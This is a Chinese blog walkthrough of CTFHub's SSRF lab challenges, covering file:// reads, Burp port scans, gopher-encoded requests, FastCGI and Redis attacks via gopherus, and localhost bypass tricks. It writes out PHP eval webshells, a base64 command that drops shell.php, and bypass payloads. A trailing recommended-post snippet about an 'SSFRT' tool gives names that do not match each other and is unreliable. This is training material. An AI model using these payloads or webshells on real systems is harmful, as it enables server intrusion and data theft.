CFTHub-web-ssrf

已于 2024-07-25 08:30:39 修改
阅读量423 收藏 6
点赞数 6
文章标签: 前端
于 2024-07-25 00:22:15 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_57524749/article/details/140673303
版权

一.内网访问

1.开启环境

2.根据题目得知访问位于127.0.0.1下的flag.php 所以我们在url后加上http://127.0.0.1/flag.php

3.复制提交flag

二.伪协议读取文件

1.开启环境

2.网站的目录文件一般都放在var/www/html目录下,我们可以输入file:///var/www/html/flag.php回车

(关于file协议:用于访问本地计算机中的文件

    格式:file:///文件路径

   可以在资源管理器或IE地址栏中输入:file:///文件路径)

3.鼠标右击查看页面源代码找出flag

三.端口扫描

1.开启环境

2.开启

3.开启BurpSuite抓包发右击选择送到Intruder

4.给端口8000添加payload位置

5.修改条件开始攻击

6.点击响应得到我们的flag

四.POST请求

1.开启环境

2.访问flag.php,出现搜索框

3.右击查看页面源代码找到key输到上一个页面的输入框

4.进行bp抓包

5.把没用的删掉host改为127.0.0.1:80

6.进行编码CTF在线工具-CTF工具|CTF编码|CTF密码学|CTF加解密|程序员工具|在线编解码

复制到记事本进行替换%0A替换为%0D%0A  替换后最后再加%0D%0A进行二次编码

二次编码

7.复制到地址栏用gopher协议,成功找到flag

五.上传文件

1.开启环境

2.访问flag

3.在页面添加提交按钮,f12,右击编辑html

4.选择文件提交抓包,删除不用的

5.进行编码复制到记事本替换%0A为%0D%0A后面加上%0D%0A

6.在进行二次转码

7.复制到地址栏用gopher协议即可找到flag

六.FastCGI协议

1.开启环境

2.输入命令

一句话木马
<?php @eval($_POST['x']);?>
base64编码后
echo "PD9waHAgQGV2YWwoJF9QT1NUW2NtZF0pOz8+" | base64 -d > shell.php

3.进行编码

4.使用菜刀工具将上边网页地址复制进去

5.在根目录下即可找到flag

七.redis协议

1.开启环境

2.使用kali打开终端

python2 gopherus.py--exploit redis
一句话木马:<?php @eval($_GET[cmd]);?>

3.讲payload进行编码上传

4.打开我们的工具菜刀在根目录下可找到flag

八.URL  Bypass

2.http://notfound.ctfhub.com 在后面输入@127.0.0.1/flag.php可绕过得到flag

九.数字IP Bypass

1.开启环境

2.我们将127.0.0.1换成localhost即可成功解出flag

十.302跳转 Bypass

1.开启环境

2.将127.0.0.1转换为十六进制即可表示为0x7f000001

十一.DNS重绑定 Bypass

1.开启环境

附件网站:

https://lock.cmpxchg8b.com/rebinder.html

2.在解析网站上获取解析到内网IP的域名并作访问即可获取其flag

这河狸吗.
关注
  • 6
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ChatGPT-Next-Web SSRF漏洞+XSS漏洞复现(CVE-2023-49785)
0xSec
03-14 1585
2024年3月,互联网上披露CVE-2023-49785 ChatGPT-Next-Web SSRF/XSS漏洞,未经身份验证的攻击者可利用此漏洞构造恶意请求获取系统内部敏感信息及配置文件,造成信息泄露。
SSRF-Testing:SSRF(服务器端请求伪造)测试资源
04-23
SSRF(服务器端请求伪造)测试资源 基于快速URL的绕过: http://google.com:80+&@127.88.23.245:22/#+@google.com:80/ http://127.88.23.245:22/+&@google.com:80#+@google.com:80/ ...
CFTHub XSS
Resets_的博客
05-08 642
CTF hub XSS
CTFHub
weixin_57455077的博客
05-03 232
判断注入点判断字段数判断回显点。
CFTHub 文件上传
Resets_的博客
04-16 3200
首先得先知道web文件上传的原理: WEB:文件上传 —— 看这篇就够了 - 云+社区 - 腾讯云 (tencent.com) 大佬的解释全面(作为还没大二分流的我还是好多看不懂 - - 难受ing) (2条消息) web文件上传下载原理浅析_爱酷的桥俏皮的博客-CSDN博客_文件下载原理 而这是简单的 - -! 一、无验证 发现无限制。 直接在记事本上写一句话木马: <?php @eval($_POST['hack']); ?> 并且把txt后缀改为php。 在选择文.
ssrf-req-filter:在 NodeJS 中发送请求时防止 SSRF 的模块。 阻止对本地和私有 IP 地址的请求
05-31
ssrf-req-filter - 防止 SSRF 攻击 :shield: 服务器端请求伪造 (SSRF) SSRF 是一种攻击媒介,它滥用应用程序与内部/外部网络或机器本身进行交互。 此向量的促成因素之一是 URL 处理不当。 安装 npm install ssrf-...
104-web漏洞挖掘之SSRF漏洞1
08-03
SSRF(Server-Side Request Forgery)漏洞是网络安全领域中的一种常见问题,它允许攻击者通过构造特定的请求,使得服务器端发起恶意的外部请求。SSRF漏洞的本质是利用服务器作为一个代理,攻击者可以借此访问那些仅...
ssrfpll.rar_DQ 锁相环_SSRF-PLL_同步锁相环_锁相环_锁相环 同步
07-14
基于同步坐标系的自建锁相环模块仿真,dq坐标系与matlab自带模块相差90度,新建的dq坐标系是符合中式习惯坐标系
CTFHUB——信息泄露
qq_44832048的博客
03-21 1910
目录遍历 新建标签页打开链接 发现一个个文件 慢慢找就能找到flag文件了 PHPINFO 打开后还是直接找就OK了 备份文件下载—网站源码 我的御剑出了点问题没扫出来,就源码后面加/www.zip类似这种一个个的试,最后找到了一个压缩包里面有个flag.txt,打开之后出来了这个, 没事把他放在源码后面就出来flag咯 ** bak文件 ** 打开之后显而易见,在源码后面加/inde...
ctf-hub 进阶
h0ld1rs的博客
11-01 447
Bypass disable_function LD_PRELOAD LD_PRELOAD,是个环境变量,用于动态库的加载,动态库加载的优先级最高,一般情况下,其加载顺序为LD_PRELOAD>LD_LIBRARY_PATH>/etc/ld.so.cache>/lib>/usr/lib。应该比较接近windows下的DLL文件。 好家伙,开局蚁剑直接连,然后进行如下操作, 思路一 如图,直接执行命令肯定是不可以的 返回的127是什么? 参考此文章,我们可以得到如下结果 h
CTFHub | 基础认证
尼泊罗河伯的博客
10-01 4814
这题有一个题目附件10_million_password_list_top_100 内容是1000 万密码列表的前 100 个,那么这题应该和暴力破解有关。在这之前,我先使用了暴力破解工具进行尝试,但是密码都试遍了也没成功。
Mysql增删改查语句,SQL注入,靶场搭建及less 1~5,cfthub基础学习
tclown的博客
11-17 611
Mysql增删改查语句,SQL注入,靶场搭建及less 1~5,cfthub基础学习
CTFHUB技能树(全详细解析含进阶)
热门推荐
hxhxhxhxx的博客
01-17 3万+
HTTP协议 请求树 根据提示直接修改头即可 302跳转 直接重放获得302跳转, Cookie 字面意思, 基础认证 简介: 在HTTP中,基本认证(英语:Basic access authentication)是允许http用户代理(如:网页浏览器)在请求时,提供 用户名 和 密码 的一种方式。详情请查看 https://zh.wikipedia.org/wiki/HTTP基本认证 附件提供了密码,很明显就是爆破 有了用户名,而且发现一个base加密的东西 解密看看 固定格式啊,
CTFHub-彩蛋(持续更新~)
u013622866的博客
03-13 3470
题目入口 这个flag拿的我是真的舒服,完全是无心插柳柳成荫啊,哈哈哈哈哈哈嗝~ 在我做CTFHub的第一道web题的时候,原本做完的我,突然想试试,关环境的瞬间能不能访问靶机呢? 然后我就迅速刷新了一下靶机首页,然后就出现了下面的界面...... 失落的随手在界面里划来划去,突然!出现了下面一幕!! !!!!!!真香!意外收获的flag!!!!!!迫不及待地F12! 赶紧提...
CTFHub-web(基础认证)
分享与记录
03-26 8953
发现题目需要登录,先任意输入admin/admin进行登录尝试。没什么反应。抓包看数据。可以看见一条特殊字符串Basic realm="Do u know admin ?,暂时没有其他线索,我们假设用户名就是admin,然后进行暴力破解。 Basic表示基础认证,字符串格式xxxxxxxxx==大概率为Base64编码 Base64解码得到开始尝试输入的账号和密码 将报文发送到Intrude...
CTFHub通关
weixin_43184518的博客
07-06 8668
CTFHub通关 这篇文章主要为我在ctfhub上的通关过程,作为记录方便以后查看。
SSRF-Testing安装
最新发布
07-25
SSRF (Server Side Request Forgery) 测试是一个用于检测服务器端请求伪造漏洞的工具,它是一种常见的安全测试技术。为了安装 SSFRT 这一工具,你可以按照以下步骤操作: ### 安装依赖 首先,确保你的系统已安装 Python 和 pip(Python 的包管理器)。在命令行界面输入: ```bash pip install -r requirements.txt ``` 如果你是使用基于 Debian 或者 Ubuntu 的 Linux 发行版,则需要先安装 `libffi-dev`、`libssl-dev`、`python-dev` 等库,可以通过运行以下命令完成: ```bash sudo apt-get update sudo apt-get install libffi-dev libssl-dev python-dev ``` 接着,在你的项目目录中创建一个名为 `requirements.txt` 的文件,并添加所需的依赖(通常包括 `requests` 库),然后再次使用 `pip` 来安装: ```txt # requirements.txt 文件内容示例 requests==2.26.0 pip install -r requirements.txt ``` ### 安装 SSFRT 工具 使用 Git 克隆 SSFRT 的仓库到本地: ```bash git clone https://github.com/ssertool/ssftrt.git cd ssftrt pip install . ``` 或者从 PyPI 直接安装(如果已发布): ```bash pip install ssftrt ``` ### 使用 SSFRT 一旦 SSFRT 成功安装,你可以在 Python 脚本中导入并使用它来进行 SSRF 测试。典型的用法如下: ```python from ssertool.ssftrt import SSFRT ssf = SSFRT() results = ssf.scan('http://example.com', {'param': 'http://target.example.com'}) print(results) ``` 在这个例子中,我们尝试通过 `http://example.com` 的 URL 发起请求,其中 `param` 参数指向了目标 URL `http://target.example.com`。 ###
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值